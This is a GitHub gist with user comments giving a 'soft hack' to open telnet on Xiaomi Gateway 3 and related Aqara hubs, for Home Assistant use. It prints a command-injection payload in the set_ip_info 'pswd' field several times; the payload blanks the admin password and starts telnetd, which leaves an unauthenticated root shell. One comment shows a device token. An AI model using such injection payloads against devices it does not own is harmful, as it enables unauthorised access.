Skip to content

Instantly share code, notes, and snippets.

@zvldz

zvldz/soft_hack.md

Last active Jun 11, 2021
Embed
What would you like to do?
soft_hack.md

Soft hack to open telnet

You need gateway 3(mgl03) connected to MiHome. And also ip and gateway token.

1 way (recommended)

Via XiaomiGateway3 component.

You must input in the 'Open Telnet command' field(as it is without changing anything):

{"method":"set_ip_info","params":{"ssid":"\"\"","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}}

2 way (recommended if not using Home Assistant)

php-miio (https://github.com/skysilver-lab/php-miio)

You may need to change id.

php miio-cli.php --ip GW_IP --token GW_TOKEN --sendcmd '{"id":123,"method":"set_ip_info","params":{"ssid":"\"\"","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}}'

3 way (maybe problem with sequence id)

python-miio (https://github.com/rytilahti/python-miio)

miiocli device --ip GW_IP --token GW_TOKEN raw_command set_ip_info '{"ssid":"\"\"","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}'

Login: admin

Password is empty

After opening telnet, it is better to install custom firmware (only for Xiaomi Gateway 3 mgl03).

Read here: https://github.com/zvldz/mgl03_fw/tree/main/firmware#the-easy-way

Open telnet command should also work with:

  • lumi.gateway.mgl03 - Mi Smart Home Hub
  • lumi.gateway.acn01 - Aqara Hub M1S CN
  • lumi.gateway.aeu01 - Aqara Hub M1S EU
  • lumi.aircondition.acn05 - Aqara Air Conditioning Controller P3
  • lumi.gateway.sacn01 - Smart USB Wall Outlet Hub

Aqara Hub E1 (ZHWG16LM usb stick)

You need gateway E1 connected to MiHome. And also ip and gateway token.

1 way

php-miio (https://github.com/skysilver-lab/php-miio)

You may need to change id.

php miio-cli.php --ip GW_IP --token GW_TOKEN --sendcmd '{"id":123,"method":"set_ip_info","params":{"ssid":"\"\"","pswd":"123123 ; /bin/riu_w 101e 53 3012; telnetd"}}'

2 way (maybe problem with sequence id)

python-miio (https://github.com/rytilahti/python-miio)

miiocli device --ip GW_IP --token GW_TOKEN raw_command set_ip_info '{"ssid":"\"\"","pswd":"123123 ;  /bin/riu_w 101e 53 3012 ; telnetd"}'

Login: root

Password is empty

I am not author, I just tested and improved and published.

@patrickgmail

This comment has been minimized.

Copy link

@patrickgmail patrickgmail commented Mar 1, 2021

@obs945

This comment has been minimized.

Copy link

@obs945 obs945 commented Mar 8, 2021

If someone is using Aqara Air Conditioning Controller P3 (lumi.aircondition.acn05) and opened telnet, please don't install custom firmware.
This morning I successfully installed custom firmware and my P3 cannot operate anymore.
Aqara customer service also told me the device cannot be repair by ourselves.
So, please don't install custom firmware.

@HomeAssistantGouveiaRicardo

This comment has been minimized.

Copy link

@HomeAssistantGouveiaRicardo HomeAssistantGouveiaRicardo commented Mar 11, 2021

{"method":"set_ip_info","params":{"ssid":"""","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}}
Is it suposed tu put my ssid and password here?
Replace "ssid" and "pswd" ?

@zvldz

This comment has been minimized.

Copy link
Owner Author

@zvldz zvldz commented Mar 12, 2021

Replace "ssid" and "pswd" ?

command must be executed as is, without changing anything

@HomeAssistantGouveiaRicardo

This comment has been minimized.

Copy link

@HomeAssistantGouveiaRicardo HomeAssistantGouveiaRicardo commented Mar 12, 2021

thansk a lot :) the divices and entities have been discovered.
Now i have a problem that the entities become unavaible sometimes....
image

@zvldz

This comment has been minimized.

Copy link
Owner Author

@zvldz zvldz commented Mar 12, 2021

You should try master version of component

@ZhiMingChang

This comment has been minimized.

Copy link

@ZhiMingChang ZhiMingChang commented Mar 13, 2021

help
lumi.gateway.mgl03 - Mi Smart Home Hub
Via XiaomiGateway3 component fail.
2021-03-13 16:54:14 DEBUG gateway3 192.168.0.107 | Prepare Gateway
2021-03-13 16:55:14 DEBUG gateway3 192.168.0.107 | Can't read devices: telnet connection closed
2021-03-13 16:55:14 DEBUG gateway3 192.168.0.107 | Prepare Gateway
2021-03-13 16:56:14 DEBUG gateway3 192.168.0.107 | Can't read devices: telnet connection closed
2021-03-13 16:56:14 DEBUG gateway3 192.168.0.107 | Prepare Gateway
2021-03-13 16:57:15 DEBUG gateway3 192.168.0.107 | Can't read devices: telnet connection closed
2021-03-13 16:57:15 DEBUG gateway3 192.168.0.107 | Prepare Gateway
2021-03-13 16:57:19 DEBUG gateway3 192.168.0.107 | Start main thread
2021-03-13 16:57:19 DEBUG gateway3 192.168.0.107 | Prepare Gateway
2021-03-13 16:58:16 DEBUG gateway3 192.168.0.107 | Can't read devices: telnet connection closed
2021-03-13 16:58:18 DEBUG gateway3 192.168.0.107 | Stop main thread
2021-03-13 16:58:20 DEBUG gateway3 192.168.0.107 | Can't read devices: telnet connection closed
2021-03-13 16:58:20 DEBUG gateway3 192.168.0.107 | Prepare Gateway
2021-03-13 16:59:04 DEBUG gateway3 192.168.0.107 | Start main thread
2021-03-13 16:59:04 DEBUG gateway3 192.168.0.107 | Prepare Gateway
2021-03-13 16:59:21 DEBUG gateway3 192.168.0.107 | Can't read devices: telnet connection closed
2021-03-13 16:59:23 DEBUG gateway3 192.168.0.107 | Stop main thread

@zvldz

This comment has been minimized.

Copy link
Owner Author

@zvldz zvldz commented Mar 13, 2021

Check ip and token.

@mumukiller

This comment has been minimized.

Copy link

@mumukiller mumukiller commented Mar 16, 2021

Does not work either. Use lumi.gateway.mgl03.Any ideas which logs can help me to understand what's working wrong?

@zvldz

This comment has been minimized.

Copy link
Owner Author

@zvldz zvldz commented Mar 16, 2021

Any ideas which logs can help me to understand what's working wrong?

How did you try to open the telnet?
If you used Home Assistant, you need to look at the logs.

@zvldz

This comment has been minimized.

Copy link
Owner Author

@zvldz zvldz commented Mar 16, 2021

You can also try the latest (today's) master version of the component for HA. Extended error messages appeared there.

@zvldz

This comment has been minimized.

Copy link
Owner Author

@zvldz zvldz commented Mar 16, 2021

Also gateway must be connected to MiHome

@mumukiller

This comment has been minimized.

Copy link

@mumukiller mumukiller commented Mar 17, 2021

@zvldz the gateway connected to MiHome. I reinstaled HA today and all related components - hacs and xiaomi gateway 3 integration. I'm trying to open it via telnet as suggested https://gist.github.com/zvldz/1bd6b21539f84339c218f9427e022709#1-way-recommended

That's all i have in logs

You are using a custom integration xiaomi_gateway3 which has not been tested by Home Assistant. This component might cause stability problems, be sure to disable it if you experience issues with Home Assistant
15:55:17 – loader.py (WARNING)
2021-03-17 15:55:11 WARNING (MainThread) [homeassistant.loader] You are using a custom integration hacs which has not been tested by Home Assistant. This component might cause stability problems, be sure to disable it if you experience issues with Home Assistant
2021-03-17 15:55:17 WARNING (MainThread) [homeassistant.loader] You are using a custom integration xiaomi_gateway3 which has not been tested by Home Assistant. This component might cause stability problems, be sure to disable it if you experience issues with Home Assistant

Gateway was discovered using mi home integration, i can check its token, mac , etc but i not able to add it using suggested way

@zvldz

This comment has been minimized.

Copy link
Owner Author

@zvldz zvldz commented Mar 18, 2021

Maybe you are entering the command incorrectly. Also it is only the first lines of the log without opening the telnet.
Install master version of the component.
Find component in hacs , select reinstall then select master.

@Arthanfel

This comment has been minimized.

Copy link

@Arthanfel Arthanfel commented Mar 18, 2021

@zvldz the gateway connected to MiHome. I reinstaled HA today and all related components - hacs and xiaomi gateway 3 integration. I'm trying to open it via telnet as suggested https://gist.github.com/zvldz/1bd6b21539f84339c218f9427e022709#1-way-recommended

That's all i have in logs

You are using a custom integration xiaomi_gateway3 which has not been tested by Home Assistant. This component might cause stability problems, be sure to disable it if you experience issues with Home Assistant
15:55:17 – loader.py (WARNING)
2021-03-17 15:55:11 WARNING (MainThread) [homeassistant.loader] You are using a custom integration hacs which has not been tested by Home Assistant. This component might cause stability problems, be sure to disable it if you experience issues with Home Assistant
2021-03-17 15:55:17 WARNING (MainThread) [homeassistant.loader] You are using a custom integration xiaomi_gateway3 which has not been tested by Home Assistant. This component might cause stability problems, be sure to disable it if you experience issues with Home Assistant

Gateway was discovered using mi home integration, i can check its token, mac , etc but i not able to add it using suggested way

Hello guys, apparently I do have the exact same problem.

My Gateway is a V3 with S/N ZNDMWG03LM
Firmware is 1.4.7_0115

At first I had to define my router as a repeater so that I would "see" it as part of the same network of my ISP "box" (french ISP routers seem to appear a tad problematic).
Now I can see it in the Gateway 3 component integration, but only this one, no child device.

Reinstalled everything through HACS, but still the same problem...

@zvldz

This comment has been minimized.

Copy link
Owner Author

@zvldz zvldz commented Mar 18, 2021

I can't understand what the problem is.
You obviously have something wrong with it.
Wait for new version of the component for HA.

@mumukiller

This comment has been minimized.

Copy link

@mumukiller mumukiller commented Mar 18, 2021

I have reinstalled component using master branch.
Now i see in logs

2021-03-18` 15:12:54 WARNING (MainThread) [custom_components.xiaomi_gateway3.core.mini_miio] 10.100.10.8 | Device offline

That's weird because i can open gateway settings using mi home application

@zvldz

This comment has been minimized.

Copy link
Owner Author

@zvldz zvldz commented Mar 18, 2021

MiHome communicates with the gateway through the cloud.
You need to check your LAN settings. The devices most likely cannot communicate with each other.

@mumukiller

This comment has been minimized.

Copy link

@mumukiller mumukiller commented Mar 18, 2021

It's not that case. Gateway available from a server where HA is located. It can be pinged and a route can be discovered

@mumukiller

This comment has been minimized.

Copy link

@mumukiller mumukiller commented Mar 18, 2021

So i decided to reset gateway and add it again to mi home. I have a some king of progress here :)

Wrong Mi Home token

@mumukiller

This comment has been minimized.

Copy link

@mumukiller mumukiller commented Mar 18, 2021

And it works!!!

  1. Reset xiaomi gateway
  2. Add it to mi home
  3. Reload xiaomi mi home component in order to get a new token
  4. It works!

@zvldz thank you!!!

@Arthanfel

This comment has been minimized.

Copy link

@Arthanfel Arthanfel commented Mar 18, 2021

And it works!!!

  1. Reset xiaomi gateway
  2. Add it to mi home
  3. Reload xiaomi mi home component in order to get a new token
  4. It works!

@zvldz thank you!!!

New step, thanks a lot.
I had to redo the thing thrice, and now it works neetly ! Thanks a lot @mumukiller and @zvldz ;)

@designerferro

This comment has been minimized.

Copy link

@designerferro designerferro commented Apr 3, 2021

Hey,

Great job here.

Got a glitch at the end, after getting telnet access:

  • Zigbee sensors no longer available.

After i got the telnet access and connect the Gateway (GW) to HASS, all my ZigBee sensors (3 motion and 1 window/door sensor) stopped communicating with the GW. Only my BLE devices were showing (3 temperature/humidity and 1 ketle)

I didn't worry to much and removed everything from HASS and Mi App. Got the GW back in the app and my BLE devices came back. This time I didn't integrated with HASS just yet and tried to pair the Zigbee devices with the GW. After 60 seconds the app says it failled.

Got the GW integrated with HASS and, again, got telnet access in integration.

Now, if i telnet to the GW, I can watch the logs going about some issues via tail -f /var/log/messages:
Apr 3 19:27:33 rlxlinux user.info <GW>: 6816 sendToCloud:to agent:{"_to":16,"id":1804289384,"method":"local.query_dev","params":{}} -- cloud/mi/cloud_interface_xiaomi.cpp:193
This keeps showing up in the GW.

Still at the GW, via telnet, I can also watch what is going on at the MQTT by subscribing to the "#" feed mosquitto_sub -t "#". I can see the GW go about the BLE devices, publishing the information gathered to the feed.

What it don't know is how to follow the ZigBee process like I do for the MQTT broker or the logs.

I found the Zigbee things at the GW by find / -name "zigbee*", but, unfortunately, I have no idea how to use this:

/bin/zigbee_agent
/bin/zigbee_inter_bootloader.sh
/bin/zigbee_reset.sh
/data/zigbee
/data/factory/zigbee_device_lumi.4cf8cdf3c74c8ba
/data/factory/zigbee_devices.conf
/data/zigbee_gw
/usr/app/bin/zigbee_gw
/usr/app/conf/zigbee_agent.conf
/usr/app/conf/zigbee_gw
/usr/app/conf/zigbee_gw.conf
/var/zigbee_gw.pid

So this is it. I got the GW connected to HASS, but lost the Zigbee communication gateway to the Zigbee devices. :(

@designerferro

This comment has been minimized.

Copy link

@designerferro designerferro commented Apr 5, 2021

UPDATE: Today, after coming home from work and having done nothing to the Mi Gateway, It paired with my sensors, and I still have Telnet access...

@sthorley

This comment has been minimized.

Copy link

@sthorley sthorley commented Apr 6, 2021

FYI for any future readers. In Home Assistant when adding the Gateway using the Xiaomi Gateway 3 integration is it not necessary to use the commands above. The pre-filled command (shorter with generic text) is all that's needed. No need to copy paste from here.

@zvldz

This comment has been minimized.

Copy link
Owner Author

@zvldz zvldz commented Apr 6, 2021

it not necessary to use the commands above

you are wrong.

@sthorley

This comment has been minimized.

Copy link

@sthorley sthorley commented Apr 6, 2021

it not necessary to use the commands above

you are wrong.

Please test the use case first.

I appreciate the work that has been put into this code however when using this in the scenario I described (Home-Assistant, Xiaomi Gateway 3 Integration via GUI) these commands did not need to be copy pasted. The pre-filled text in the Open Telnet command field: {"method":"enable_telnet_service","params":""} worked on my version v1.4.7_0160 gateway while my initial attempt replacing this with the text above (Option 1) did not.

Perhaps AlexxIT has changed the default telnet open command recently?

@zvldz

This comment has been minimized.

Copy link
Owner Author

@zvldz zvldz commented Apr 6, 2021

Are you using the stock version 1.4.7_0160 ?
AlexxIT uses only the standard command to open the telnet.

@sthorley

This comment has been minimized.

Copy link

@sthorley sthorley commented Apr 6, 2021

Are you using the stock version 1.4.7_0160 ?
AlexxIT uses only the standard command to open the telnet.

Yes stock v1.4.7_160. It had only been updated from v1.4.6_040 about 5 minutes before and I’d tried the standard command on the 1.4.6_040 version which gave an error. Perhaps some of it had persisted and that’s why it worked?
I’m not certain how it works (if the changes made by the integration allow for standard telnet after first connection) but I currently have the telnet connected on a v1.4.7_160 gateway with the integration set to use the standard command not the one in the first post.

84F975AF-F30A-4AD4-BE7F-1B1870F3E992
5BB411FD-5F6D-4141-B957-87A932A9C59F
E5E5EA39-EB26-457A-8A49-8C9406F9C95D

@zvldz

This comment has been minimized.

Copy link
Owner Author

@zvldz zvldz commented Apr 6, 2021

Yes stock v1.4.7_160. It had only been updated from v1.4.6_040 about 5 minutes before and I’d tried the standard command on the 1.4.6_040 version which gave an error. Perhaps some of it had persisted and that’s why it worked?

Did you upgrade from v1.4.6_040 to v1.4.7_160 via MiHome ?
In any case, to get the telnet on firmware 1.4.7 you need a magic command, if it is not a modified firmware.

@sthorley

This comment has been minimized.

Copy link

@sthorley sthorley commented Apr 6, 2021

Did you upgrade from v1.4.6_040 to v1.4.7_160 via MiHome ?

Yes. I have a second gateway which I can test on so I'll try this process again and confirm.

@sebas1986

This comment has been minimized.

Copy link

@sebas1986 sebas1986 commented Apr 10, 2021

Hello all! I've added the Xiaomi Gateway 3 integration, used the Cloud Xiaomi account User and Password but when I click Options I get: "No devices in account". I've got Xiaomi Home app on my iPhone preperly working, with my gateway v3 set and some sensor associated and working . Any Idea? Many thanks

Sebastian

@zvldz

This comment has been minimized.

Copy link
Owner Author

@zvldz zvldz commented Apr 10, 2021

Any Idea?

You'd better ask this question here - https://github.com/AlexxIT/XiaomiGateway3

@smougenot

This comment has been minimized.

Copy link

@smougenot smougenot commented Apr 12, 2021

Works fine ... thank you very much 👏 👏 👏

  • firmware 1.4.7_160
  • command way 1
@jamesht1

This comment has been minimized.

Copy link

@jamesht1 jamesht1 commented Apr 18, 2021

my gateways 3 is firmware 1.4.7_160.
where do I excute this command
{"method":"set_ip_info","params":{"ssid":"""","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}}

@xels2

This comment has been minimized.

Copy link

@xels2 xels2 commented Apr 27, 2021

gateway 3, firmware 1.4.7_0160.
way 1 didnt work for me.
way 2 worked with this command from cmd (php on windows 10):
php miio-cli.php --ip GW_IP --token GW_TOKEN --sendcmd "{'id':130,'method':'set_ip_info','params':{'ssid':'\'\'','pswd':'123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd'}}"

pay attention to the quotes.

@thejonesyboy

This comment has been minimized.

Copy link

@thejonesyboy thejonesyboy commented May 6, 2021

@zvldz thank you for your contribution. I could not get 'way 2' or 'way 3' working. Runing Windows 10, with php and python installed and dependencies configured correctly.

device
Aqara Hub M1S CN ZHWG15LM

first steps
I switched the hub to Mijia (Mi Home) mode using the 'press button 10 times and then 2 times' method. I then added the hub to the Mi Home app using the China mainland region. (This was painful process that failed many times before it finally worked). Then I used token_extractor.exe from https://github.com/PiotrMachowski/Xiaomi-cloud-tokens-extractor to extract my token from the 'cn' server.

way 2
command:
php miio-cli.php --ip 192.168.1.136 --token 736b3730545234587265356c49315750 --sendcmd '{"id":123,"method":"set_ip_info","params":{"ssid":"\"\"","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}}'
result:
Устройство 192.168.1.136 не доступно или не отвечает.
result (translated):
Device 192.168.1.136 is not available or is not responding.

Although, the device is discoverable using command:
php miio-cli.php --discover 192.168.1.136 --debug
result:

array(2) {
  ["discover"]=>
  string(13) "192.168.1.136"
  ["debug"]=>
  bool(false)
}
Поиск 192.168.1.136
Соединение с устройством IP 192.168.1.136
Статус отладки [1]
Сокет успешно создан

Проверяем доступность устройства 192.168.1.136
Параметр SO_RCVTIMEO сокета успешно задан
 >>>>> Отправляем hello-пакет на 192.168.1.136 с таймаутом 5
 >>>>> Отправлено в сокет 32 байт
 <<<<< Получен ответ от IP 192.168.1.136 с порта 54321
Прочитано 32 байта из сокета
magic: 2131
length: 0020 --> 32 байт
unknown1: 00000000
devicetype: 185d
serial: ceb0
ts: 6093ee8a --> 1620307594 секунд --> 2021-05-06 13:26:34
checksum: ffffffffffffffffffffffffffffffff
ts_server: 6093ee8b --> 1620307595 секунд --> 2021-05-06 13:26:35
timediff: -1
Поиск выполнен.
Устройство найдено и отвечает.

result (translated):

array (2) {
  ["discover"] =>
  string (13) "192.168.1.136"
  ["debug"] =>
  bool (false)
}
Search 192.168.1.136
Connection with IP 192.168.1.136 device
Debug status [1]
Socket created successfully

Checking the availability of device 192.168.1.136
SO_RCVTIMEO socket option set successfully
 >>>>> Sending a hello packet to 192.168.1.136 with a timeout of 5
 >>>>> 32 bytes sent on socket
 <<<<< Received response from IP 192.168.1.136 from port 54321
Read 32 bytes from socket
magic: 2131
length: 0020 -> 32 bytes
unknown1: 00000000
devicetype: 185d
serial: ceb0
ts: 6093ee8a -> 1620307594 seconds -> 2021-05-06 13:26:34
checksum: fffffffffffffffffffffffffffffffff
ts_server: 6093ee8b -> 1620307595 seconds -> 2021-05-06 13:26:35
timediff: -1
Search completed.
The device is found and responds.

@zvldz I have a question for way 2: what does "You may need to change id." mean?

way 3
command:
miiocli device --ip 192.168.1.136 --token 736b3730545234587265356c49315750 raw_command set_ip_info '{"ssid":"\"\"","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}'
result:

Running command raw_command
Error: Unable to discover the device 192.168.1.136

Although (again), the device is discoverable using command:

miiocli discover

INFO:miio.miioprotocol:Sending discovery to <broadcast> with timeout of 5s..
INFO:miio.miioprotocol:  IP 192.168.1.136 (ID: 185dceb0) - token: b'ffffffffffffffffffffffffffffffff'
INFO:miio.miioprotocol:Discovery done

@zvldz I have a question for way 3: what does "maybe problem with sequence id" mean?

@xels2

This comment has been minimized.

Copy link

@xels2 xels2 commented May 11, 2021

@thejonesyboy
In way 2 "You may need to change id." means that each time you execute the commant you need to change the id by adding one to it. The first request with id 123, the second with 124, and so on.

@edtorrealba

This comment has been minimized.

Copy link

@edtorrealba edtorrealba commented May 27, 2021

And it works!!!

  1. Reset xiaomi gateway
  2. Add it to mi home
  3. Reload xiaomi mi home component in order to get a new token
  4. It works!

@zvldz thank you!!!

Hi All! This Method works perfect for me. i have 1.4.6_0043

@mpsOxygen

This comment has been minimized.

Copy link

@mpsOxygen mpsOxygen commented Jun 2, 2021

Hello,

Great work! I am trying to understand how this little firmware works, from what I can tell your soft hack calls /bin/reset_wifi_info.sh "" 123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd . But I cannot find where you found the set_ip_info method. Would you mind sharing how you found it or at least pointing me in the right direction?

Thank you!

@zvldz

This comment has been minimized.

Copy link
Owner Author

@zvldz zvldz commented Jun 3, 2021

Would you mind sharing how you found it or at least pointing me in the right direction?

on gw in file /bin/zigbee_gw :)

@mpsOxygen

This comment has been minimized.

Copy link

@mpsOxygen mpsOxygen commented Jun 4, 2021

Thank you. I was only looking at miio_client & miio_agent.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment